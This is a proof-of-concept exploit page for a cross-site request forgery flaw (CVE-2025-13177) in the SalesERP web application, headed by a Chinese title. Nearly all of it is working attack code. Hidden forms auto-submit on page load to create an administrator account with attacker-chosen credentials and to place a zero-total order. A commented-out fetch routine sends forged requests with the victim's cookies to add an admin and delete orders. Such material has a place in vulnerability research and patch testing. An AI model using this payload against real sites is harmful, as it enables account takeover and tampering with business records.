CVE-2025-13177 | Bdtask CodeCanyon SalesERP跨站请求伪造漏洞

<!-- CSRF PoC for CVE-2025-13177 - Bdtask CodeCanyon SalesERP --> <!-- This PoC demonstrates CSRF attack on SalesERP user management --> <!DOCTYPE html> <html> <head> <title>SalesERP CSRF Attack PoC</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .malicious-form { display: none; } .info { color: #666; font-size: 12px; } </style> </head> <body> <h2>CVE-2025-13177 CSRF PoC</h2> <p class="info">Target: Bdtask/CodeCanyon SalesERP</p> <!-- Auto-submit form targeting SalesERP user creation endpoint --> <form id="csrfForm" class="malicious-form" action="http://target-server/saleserp/index.php/admin/user/create" method="POST"> <input type="hidden" name="username" value="attacker_created"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="user_role" value="admin"> <input type="hidden" name="csrf_token" value=""> </form> <!-- Form targeting SalesERP order processing --> <form id="orderForm" class="malicious-form" action="http://target-server/saleserp/index.php/sales/order/create" method="POST"> <input type="hidden" name="customer_id" value="999"> <input type="hidden" name="product_ids" value="1,2,3"> <input type="hidden" name="quantity" value="100"> <input type="hidden" name="total_amount" value="0"> </form> <script> // Auto-submit both forms when page loads window.onload = function() { console.log('CSRF PoC executing...'); document.getElementById('csrfForm').submit(); setTimeout(function() { document.getElementById('orderForm').submit(); }, 1000); }; </script> <p>Redirecting...</p> <script> // Alternative: Use fetch API for more stealthy attack async function exploitCSRF() { const targets = [ { url: 'http://target-server/saleserp/index.php/admin/user/create', data: new URLSearchParams({ 'username': 'hacked_user', 'email': '[email protected]', 'password': 'Hacked123!', 'user_role': 'admin' }) }, { url: 'http://target-server/saleserp/index.php/sales/order/delete/1', data: new URLSearchParams({ 'confirm': 'yes' }) } ]; for (const target of targets) { try { await fetch(target.url, { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: target.data }); console.log('Request sent to: ' + target.url); } catch (e) { console.error('Error:', e); } } } // Uncomment to use fetch-based attack // exploitCSRF(); </script> </body> </html>